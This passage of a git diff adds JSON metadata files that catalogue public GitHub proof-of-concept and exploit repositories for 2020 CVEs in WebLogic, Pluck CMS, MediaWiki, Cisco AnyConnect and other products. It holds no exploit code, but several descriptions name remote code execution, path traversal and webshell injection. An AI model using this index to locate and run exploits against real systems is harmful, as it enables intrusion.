"user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MagicZer0\/Weblogic_CVE-2020-2883_POC", + "description": "Proof of concept for Weblogic CVE-2020-2883", + "fork": false, + "created_at": "2020-05-13T09:56:48Z", + "updated_at": "2024-01-12T11:24:56Z", + "pushed_at": "2020-05-13T10:19:07Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 270910365, + "name": "CVE-2020-2883", + "full_name": "ZZZWD\/CVE-2020-2883", + "owner": { + "login": "ZZZWD", + "id": 30427031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30427031?v=4", + "html_url": "https:\/\/github.com\/ZZZWD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZZWD\/CVE-2020-2883", + "description": "适配12.2.1.3和12.2.1.4版本", + "fork": false, + "created_at": "2020-06-09T05:23:11Z", + "updated_at": "2020-06-09T05:23:27Z", + "pushed_at": "2020-06-09T05:23:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 288624943, + "name": "WebLogic-Shiro-shell", + "full_name": "Y4er\/WebLogic-Shiro-shell", + "owner": { + "login": "Y4er", + "id": 40487319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40487319?v=4", + "html_url": "https:\/\/github.com\/Y4er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y4er\/WebLogic-Shiro-shell", + "description": "WebLogic利用CVE-2020-2883打Shiro rememberMe反序列化漏洞,一键注册蚁剑filter内存shell", + "fork": false, + "created_at": "2020-08-19T03:34:06Z", + "updated_at": "2024-11-02T03:32:25Z", + "pushed_at": "2020-08-25T03:17:32Z", + "stargazers_count": 531, + "watchers_count": 531, + "has_discussions": false, + "forks_count": 62, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 62, + "watchers": 531, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 304156994, + "name": "CVE-2020-2883", + "full_name": "FancyDoesSecurity\/CVE-2020-2883", + "owner": { + "login": "FancyDoesSecurity", + "id": 70301836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70301836?v=4", + "html_url": "https:\/\/github.com\/FancyDoesSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FancyDoesSecurity\/CVE-2020-2883", + "description": null, + "fork": false, + "created_at": "2020-10-14T23:12:39Z", + "updated_at": "2020-11-03T23:46:48Z", + "pushed_at": "2020-10-14T23:14:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 316249865, + "name": "CVE-2020-2883", + "full_name": "Al1ex\/CVE-2020-2883", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-2883", + "description": "CVE-2020-2883", + "fork": false, + "created_at": "2020-11-26T14:10:25Z", + "updated_at": "2024-08-12T20:07:58Z", + "pushed_at": "2020-11-27T02:12:52Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-2883", + "weblogic" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 428189487, + "name": "POC_CVE-2020-2883", + "full_name": "Qynklee\/POC_CVE-2020-2883", + "owner": { + "login": "Qynklee", + "id": 23394219, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23394219?v=4", + "html_url": "https:\/\/github.com\/Qynklee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Qynklee\/POC_CVE-2020-2883", + "description": "POC for CVE-2020-2883", + "fork": false, + "created_at": "2021-11-15T08:56:44Z", + "updated_at": "2021-11-15T09:17:59Z", + "pushed_at": "2021-11-15T09:17:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28874.json b/2020/CVE-2020-28874.json new file mode 100644 index 0000000000..1eb124aaf9 --- /dev/null +++ b/2020/CVE-2020-28874.json @@ -0,0 +1,33 @@ +[ + { + "id": 331631898, + "name": "CVE-2020-28874", + "full_name": "varandinawer\/CVE-2020-28874", + "owner": { + "login": "varandinawer", + "id": 9851011, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9851011?v=4", + "html_url": "https:\/\/github.com\/varandinawer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varandinawer\/CVE-2020-28874", + "description": "CVE-2020-28874", + "fork": false, + "created_at": "2021-01-21T13:11:30Z", + "updated_at": "2021-01-21T13:31:12Z", + "pushed_at": "2021-01-21T13:29:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28926.json b/2020/CVE-2020-28926.json new file mode 100644 index 0000000000..56e2820c2a --- /dev/null +++ b/2020/CVE-2020-28926.json @@ -0,0 +1,33 @@ +[ + { + "id": 344263881, + "name": "exploit-CVE-2020-28926", + "full_name": "lorsanta\/exploit-CVE-2020-28926", + "owner": { + "login": "lorsanta", + "id": 48159385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48159385?v=4", + "html_url": "https:\/\/github.com\/lorsanta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lorsanta\/exploit-CVE-2020-28926", + "description": null, + "fork": false, + "created_at": "2021-03-03T21:06:56Z", + "updated_at": "2022-03-13T11:21:19Z", + "pushed_at": "2021-03-03T21:26:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-28948.json b/2020/CVE-2020-28948.json new file mode 100644 index 0000000000..3051fdf7ba --- /dev/null +++ b/2020/CVE-2020-28948.json @@ -0,0 +1,95 @@ +[ + { + "id": 316481683, + "name": "CVE-2020-28948-and-CVE-2020-28949", + "full_name": "0x240x23elu\/CVE-2020-28948-and-CVE-2020-28949", + "owner": { + "login": "0x240x23elu", + "id": 52744492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52744492?v=4", + "html_url": "https:\/\/github.com\/0x240x23elu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x240x23elu\/CVE-2020-28948-and-CVE-2020-28949", + "description": null, + "fork": false, + "created_at": "2020-11-27T11:21:46Z", + "updated_at": "2024-08-12T20:07:59Z", + "pushed_at": "2020-11-27T11:26:01Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 370402145, + "name": "cve-2020-28948", + "full_name": "nopdata\/cve-2020-28948", + "owner": { + "login": "nopdata", + "id": 26320567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26320567?v=4", + "html_url": "https:\/\/github.com\/nopdata", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nopdata\/cve-2020-28948", + "description": null, + "fork": false, + "created_at": "2021-05-24T15:36:16Z", + "updated_at": "2021-05-24T15:39:06Z", + "pushed_at": "2021-05-24T15:39:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 544836274, + "name": "PoC-for-CVE-2020-28948-CVE-2020-28949", + "full_name": "JinHao-L\/PoC-for-CVE-2020-28948-CVE-2020-28949", + "owner": { + "login": "JinHao-L", + "id": 52820430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52820430?v=4", + "html_url": "https:\/\/github.com\/JinHao-L", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JinHao-L\/PoC-for-CVE-2020-28948-CVE-2020-28949", + "description": null, + "fork": false, + "created_at": "2022-10-03T10:10:11Z", + "updated_at": "2022-10-03T10:19:11Z", + "pushed_at": "2022-10-17T13:56:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29007.json b/2020/CVE-2020-29007.json new file mode 100644 index 0000000000..63dce89faf --- /dev/null +++ b/2020/CVE-2020-29007.json @@ -0,0 +1,41 @@ +[ + { + "id": 319646680, + "name": "cve-2020-29007", + "full_name": "seqred-s-a\/cve-2020-29007", + "owner": { + "login": "seqred-s-a", + "id": 49437606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49437606?v=4", + "html_url": "https:\/\/github.com\/seqred-s-a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seqred-s-a\/cve-2020-29007", + "description": "Remote code execution in Mediawiki Score", + "fork": false, + "created_at": "2020-12-08T13:27:31Z", + "updated_at": "2020-12-08T13:36:46Z", + "pushed_at": "2020-12-08T13:35:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-29007", + "exploit", + "lilypond", + "mediawiki", + "mediawiki-extension", + "security" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29070.json b/2020/CVE-2020-29070.json new file mode 100644 index 0000000000..b6ab45adfd --- /dev/null +++ b/2020/CVE-2020-29070.json @@ -0,0 +1,33 @@ +[ + { + "id": 315874415, + "name": "cve-2020-29070", + "full_name": "aslanemre\/cve-2020-29070", + "owner": { + "login": "aslanemre", + "id": 52652572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52652572?v=4", + "html_url": "https:\/\/github.com\/aslanemre", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aslanemre\/cve-2020-29070", + "description": "CVE-2020-29070 write-up.", + "fork": false, + "created_at": "2020-11-25T08:25:36Z", + "updated_at": "2020-12-05T13:03:30Z", + "pushed_at": "2020-11-25T17:43:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29134.json b/2020/CVE-2020-29134.json new file mode 100644 index 0000000000..7504f868e8 --- /dev/null +++ b/2020/CVE-2020-29134.json @@ -0,0 +1,44 @@ +[ + { + "id": 338040790, + "name": "CVE-2020-29134", + "full_name": "Ls4ss\/CVE-2020-29134", + "owner": { + "login": "Ls4ss", + "id": 25537761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25537761?v=4", + "html_url": "https:\/\/github.com\/Ls4ss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ls4ss\/CVE-2020-29134", + "description": "Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal", + "fork": false, + "created_at": "2021-02-11T13:44:40Z", + "updated_at": "2024-06-10T14:30:57Z", + "pushed_at": "2022-08-24T19:24:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cwe-22", + "exploit", + "fluig", + "hacking", + "path-traversal", + "payload", + "pentest", + "pentest-tool", + "totvs" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29156.json b/2020/CVE-2020-29156.json new file mode 100644 index 0000000000..abb5b41a85 --- /dev/null +++ b/2020/CVE-2020-29156.json @@ -0,0 +1,33 @@ +[ + { + "id": 323442733, + "name": "CVE-2020-29156", + "full_name": "Ko-kn3t\/CVE-2020-29156", + "owner": { + "login": "Ko-kn3t", + "id": 57166441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57166441?v=4", + "html_url": "https:\/\/github.com\/Ko-kn3t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ko-kn3t\/CVE-2020-29156", + "description": "woocommerce wordpress plugin - Affected Version: V 4.5.2 [CVE-2020-29156]", + "fork": false, + "created_at": "2020-12-21T20:38:50Z", + "updated_at": "2020-12-26T16:13:17Z", + "pushed_at": "2020-12-21T20:48:21Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29254.json b/2020/CVE-2020-29254.json new file mode 100644 index 0000000000..6bffacc5c8 --- /dev/null +++ b/2020/CVE-2020-29254.json @@ -0,0 +1,33 @@ +[ + { + "id": 320353617, + "name": "CVE-2020-29254", + "full_name": "S1lkys\/CVE-2020-29254", + "owner": { + "login": "S1lkys", + "id": 40408435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40408435?v=4", + "html_url": "https:\/\/github.com\/S1lkys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S1lkys\/CVE-2020-29254", + "description": "TikiWiki 21.2 allows to edit templates without the use of a CSRF protection. ", + "fork": false, + "created_at": "2020-12-10T18:13:47Z", + "updated_at": "2024-08-12T20:08:22Z", + "pushed_at": "2024-02-08T14:26:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29364.json b/2020/CVE-2020-29364.json new file mode 100644 index 0000000000..b002892383 --- /dev/null +++ b/2020/CVE-2020-29364.json @@ -0,0 +1,33 @@ +[ + { + "id": 316557251, + "name": "CVE-2020-29364", + "full_name": "aslanemre\/CVE-2020-29364", + "owner": { + "login": "aslanemre", + "id": 52652572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52652572?v=4", + "html_url": "https:\/\/github.com\/aslanemre", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aslanemre\/CVE-2020-29364", + "description": null, + "fork": false, + "created_at": "2020-11-27T17:01:35Z", + "updated_at": "2020-12-05T13:03:30Z", + "pushed_at": "2020-11-27T17:07:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29370.json b/2020/CVE-2020-29370.json new file mode 100644 index 0000000000..16cd90bd59 --- /dev/null +++ b/2020/CVE-2020-29370.json @@ -0,0 +1,33 @@ +[ + { + "id": 475723552, + "name": "linux-4.19.72_CVE-2020-29370", + "full_name": "nanopathi\/linux-4.19.72_CVE-2020-29370", + "owner": { + "login": "nanopathi", + "id": 26024136, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4", + "html_url": "https:\/\/github.com\/nanopathi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanopathi\/linux-4.19.72_CVE-2020-29370", + "description": null, + "fork": false, + "created_at": "2022-03-30T04:52:56Z", + "updated_at": "2023-01-31T19:41:55Z", + "pushed_at": "2022-12-09T11:11:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2950.json b/2020/CVE-2020-2950.json new file mode 100644 index 0000000000..4f7d9f7188 --- /dev/null +++ b/2020/CVE-2020-2950.json @@ -0,0 +1,33 @@ +[ + { + "id": 369458782, + "name": "CVE-2020-2950", + "full_name": "tuo4n8\/CVE-2020-2950", + "owner": { + "login": "tuo4n8", + "id": 21272757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21272757?v=4", + "html_url": "https:\/\/github.com\/tuo4n8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuo4n8\/CVE-2020-2950", + "description": null, + "fork": false, + "created_at": "2021-05-21T07:57:50Z", + "updated_at": "2024-07-22T14:57:14Z", + "pushed_at": "2021-09-29T15:28:01Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29583.json b/2020/CVE-2020-29583.json new file mode 100644 index 0000000000..51f3756770 --- /dev/null +++ b/2020/CVE-2020-29583.json @@ -0,0 +1,33 @@ +[ + { + "id": 326532749, + "name": "scan_CVE-2020-29583", + "full_name": "ruppde\/scan_CVE-2020-29583", + "owner": { + "login": "ruppde", + "id": 46819580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46819580?v=4", + "html_url": "https:\/\/github.com\/ruppde", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ruppde\/scan_CVE-2020-29583", + "description": "Scanner for Zyxel products which are potentially vulnerable due to an undocumented user account (CVE-2020-29583)", + "fork": false, + "created_at": "2021-01-04T00:56:55Z", + "updated_at": "2024-08-31T17:06:00Z", + "pushed_at": "2021-01-04T22:55:37Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29599.json b/2020/CVE-2020-29599.json new file mode 100644 index 0000000000..ec732e2e92 --- /dev/null +++ b/2020/CVE-2020-29599.json @@ -0,0 +1,33 @@ +[ + { + "id": 452904923, + "name": "CVE-2020-29599", + "full_name": "lnwza0x0a\/CVE-2020-29599", + "owner": { + "login": "lnwza0x0a", + "id": 96345719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96345719?v=4", + "html_url": "https:\/\/github.com\/lnwza0x0a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnwza0x0a\/CVE-2020-29599", + "description": null, + "fork": false, + "created_at": "2022-01-28T01:45:07Z", + "updated_at": "2022-03-11T05:03:36Z", + "pushed_at": "2022-01-28T01:59:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29607.json b/2020/CVE-2020-29607.json new file mode 100644 index 0000000000..0d9c08ccb5 --- /dev/null +++ b/2020/CVE-2020-29607.json @@ -0,0 +1,64 @@ +[ + { + "id": 499937180, + "name": "CVE-2020-29607", + "full_name": "0xAbbarhSF\/CVE-2020-29607", + "owner": { + "login": "0xAbbarhSF", + "id": 67552744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67552744?v=4", + "html_url": "https:\/\/github.com\/0xAbbarhSF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAbbarhSF\/CVE-2020-29607", + "description": "A file upload restriction bypass vulnerability in Pluck CMS before 4.7.13 allows an admin privileged user to gain access in the host through the \"manage files\" functionality, which may result in remote code execution.", + "fork": false, + "created_at": "2022-06-04T21:09:38Z", + "updated_at": "2024-06-23T17:59:53Z", + "pushed_at": "2022-06-04T21:11:13Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 722884365, + "name": "CVE-2020-29607", + "full_name": "0xN7y\/CVE-2020-29607", + "owner": { + "login": "0xN7y", + "id": 70061541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70061541?v=4", + "html_url": "https:\/\/github.com\/0xN7y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xN7y\/CVE-2020-29607", + "description": "Exploit forCVE-2020-29607", + "fork": false, + "created_at": "2023-11-24T07:20:18Z", + "updated_at": "2023-11-26T08:30:26Z", + "pushed_at": "2023-11-24T09:33:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29661.json b/2020/CVE-2020-29661.json new file mode 100644 index 0000000000..8ff0beb902 --- /dev/null +++ b/2020/CVE-2020-29661.json @@ -0,0 +1,33 @@ +[ + { + "id": 838190475, + "name": "arm-CVE-2020-29661", + "full_name": "wojkos9\/arm-CVE-2020-29661", + "owner": { + "login": "wojkos9", + "id": 38809282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38809282?v=4", + "html_url": "https:\/\/github.com\/wojkos9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wojkos9\/arm-CVE-2020-29661", + "description": null, + "fork": false, + "created_at": "2024-08-05T06:15:26Z", + "updated_at": "2024-08-05T13:25:25Z", + "pushed_at": "2024-09-02T06:48:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29666.json b/2020/CVE-2020-29666.json new file mode 100644 index 0000000000..9da5f8a8d9 --- /dev/null +++ b/2020/CVE-2020-29666.json @@ -0,0 +1,33 @@ +[ + { + "id": 320179942, + "name": "CVE-2020-29666", + "full_name": "jet-pentest\/CVE-2020-29666", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2020-29666", + "description": null, + "fork": false, + "created_at": "2020-12-10T06:24:48Z", + "updated_at": "2021-02-14T09:24:16Z", + "pushed_at": "2020-12-10T06:39:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29667.json b/2020/CVE-2020-29667.json new file mode 100644 index 0000000000..bfed2e4f5f --- /dev/null +++ b/2020/CVE-2020-29667.json @@ -0,0 +1,33 @@ +[ + { + "id": 320183812, + "name": "CVE-2020-29667", + "full_name": "jet-pentest\/CVE-2020-29667", + "owner": { + "login": "jet-pentest", + "id": 71512502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4", + "html_url": "https:\/\/github.com\/jet-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2020-29667", + "description": null, + "fork": false, + "created_at": "2020-12-10T06:43:58Z", + "updated_at": "2021-02-14T09:24:13Z", + "pushed_at": "2020-12-10T07:04:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-29669.json b/2020/CVE-2020-29669.json new file mode 100644 index 0000000000..2dcf1a2db2 --- /dev/null +++ b/2020/CVE-2020-29669.json @@ -0,0 +1,33 @@ +[ + { + "id": 318305323, + "name": "CVE-2020-29669", + "full_name": "code-byter\/CVE-2020-29669", + "owner": { + "login": "code-byter", + "id": 10854537, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10854537?v=4", + "html_url": "https:\/\/github.com\/code-byter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/code-byter\/CVE-2020-29669", + "description": "Macally WIFISD2", + "fork": false, + "created_at": "2020-12-03T20:00:09Z", + "updated_at": "2024-08-12T20:08:11Z", + "pushed_at": "2020-12-12T13:00:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2969.json b/2020/CVE-2020-2969.json new file mode 100644 index 0000000000..dce4a594d4 --- /dev/null +++ b/2020/CVE-2020-2969.json @@ -0,0 +1,33 @@ +[ + { + "id": 817236188, + "name": "CVE-2020-2969", + "full_name": "emad-almousa\/CVE-2020-2969", + "owner": { + "login": "emad-almousa", + "id": 48997609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4", + "html_url": "https:\/\/github.com\/emad-almousa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2020-2969", + "description": "CVE-2020-2969", + "fork": false, + "created_at": "2024-06-19T09:40:56Z", + "updated_at": "2024-06-19T09:41:45Z", + "pushed_at": "2024-06-19T09:41:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2978.json b/2020/CVE-2020-2978.json new file mode 100644 index 0000000000..02c61f1cb2 --- /dev/null +++ b/2020/CVE-2020-2978.json @@ -0,0 +1,33 @@ +[ + { + "id": 322514965, + "name": "CVE-2020-2978", + "full_name": "emad-almousa\/CVE-2020-2978", + "owner": { + "login": "emad-almousa", + "id": 48997609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4", + "html_url": "https:\/\/github.com\/emad-almousa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2020-2978", + "description": "CVE-2020-2978", + "fork": false, + "created_at": "2020-12-18T06:56:51Z", + "updated_at": "2021-01-10T15:02:00Z", + "pushed_at": "2021-01-10T15:01:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-3153.json b/2020/CVE-2020-3153.json new file mode 100644 index 0000000000..e479343e0b --- /dev/null +++ b/2020/CVE-2020-3153.json @@ -0,0 +1,100 @@ +[ + { + "id": 261266121, + "name": "CVE-2020-3153", + "full_name": "shubham0d\/CVE-2020-3153", + "owner": { + "login": "shubham0d", + "id": 12750163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12750163?v=4", + "html_url": "https:\/\/github.com\/shubham0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shubham0d\/CVE-2020-3153", + "description": "POC code for CVE-2020-3153 - Cisco anyconnect path traversal vulnerability", + "fork": false, + "created_at": "2020-05-04T18:36:22Z", + "updated_at": "2024-08-12T20:01:06Z", + 